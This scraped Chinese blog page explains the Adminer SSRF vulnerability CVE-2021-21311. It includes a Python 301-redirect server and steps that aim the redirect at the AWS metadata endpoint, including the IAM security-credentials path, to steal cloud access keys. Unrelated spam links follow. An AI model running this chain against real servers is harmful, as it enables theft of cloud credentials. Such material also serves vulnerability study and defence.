当前位置: 首页 > news >正文

深喉咙企业网站生成系统哪个网站可以帮人做ppt

深喉咙企业网站生成系统,哪个网站可以帮人做ppt,用什么做视频网站,word超链接网站怎么做Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞&#xff08…

Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。

在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。

参考连接:

https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml

1.在Adminer登录页面,选择ElasticSearch作为系统目标,并在server字段填写`example.com`,点击登录即可看到`example.com`返回的400错误页面展示在页面中

Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com)

使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。

参考链接:

  • SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHub
  • https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd

首先,启动一个python服务器,该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下,重定向指向AWS元数据服务:

http://169.254.169.254/latest/meta-data/instance-id

然后,在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器,这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。

重定向请求的python脚本:

#!/usr/bin/env pythonimport SimpleHTTPServer
import SocketServer
import sys
import argparsedef redirect_handler_factory(url):"""Returns a request handler class that redirects to supplied `url`"""class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header('Location', url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header('Location', url)self.end_headers()return RedirectHandlerdef main():parser = argparse.ArgumentParser(description='HTTP redirect server')parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')parser.add_argument('redirect_url', action="store")myargs = parser.parse_args()redirect_url = myargs.redirect_urlport = myargs.porthost = myargs.ipredirectHandler = redirect_handler_factory(redirect_url)handler = SocketServer.TCPServer((host, port), redirectHandler)print("serving at port %s" % port)handler.serve_forever()if __name__ == "__main__":main()
http://169.254.169.254/latest/meta-data/iam/security-credentials/  //列出服务器的可用角色。
http://www.yayakq.cn/news/162062/

相关文章:

  • 网站后台添加查看爬虫的痕迹手机可以开发网站
  • 谷歌站长平台做网站要学点什么
  • 企业的网站建设费用做类似电影天堂的网站违法吗
  • 手机网站多少钱一个海外推广怎么做
  • 网站空间支付方式嵌入式软件开发招聘
  • 网站定制方案智囊团建网上登录入口
  • 网站数据库连接不上的常见问题wordpress快捷登录
  • 抚顺 网站建设微信推广员
  • 河北中保建设集团网站音乐网站开发需要什么语言工具
  • 空包网站做红章底单m99ww094cn 苍井空做的网站
  • 建设银行官方网站诚聘英才查公司的国家网站有哪些
  • 外贸营销单页网站大城 网站
  • php网站设置如何使用网站更改文章标题
  • 能直接用网站做海报吗电子商务网站营销方案
  • 钦州网站建设不可上网
  • 网站建设欧美风格中铁三局招聘2022
  • 怎样给网站做关键词优化wap网站制作软件
  • 企业网站设计服务元芳重庆网站建设
  • 做视频网站投入多少设计之家官网首页
  • 网站备案分为几种怎样在百度上发帖子
  • 博罗网站开发关于做网站的了解点
  • 设计网站页面鉴赏技巧pptwordpress怎样将小工具放到左侧
  • 门户网站开发 论文推广公司简介
  • 站外推广免费网站平凉崆峒建设局网站
  • 北京南站官网邯郸网站建设推荐驰捷网络公司
  • 网站推广要点有名的网站制作公司
  • 学校网站怎样建设wordpress素材下载源码
  • 我看别人做系统就直接网站下载文件为什么高德地图没有外国位置信息
  • 如何做企业招聘网站官网定制公司
  • 珠海网站设计哪家好策划公司电话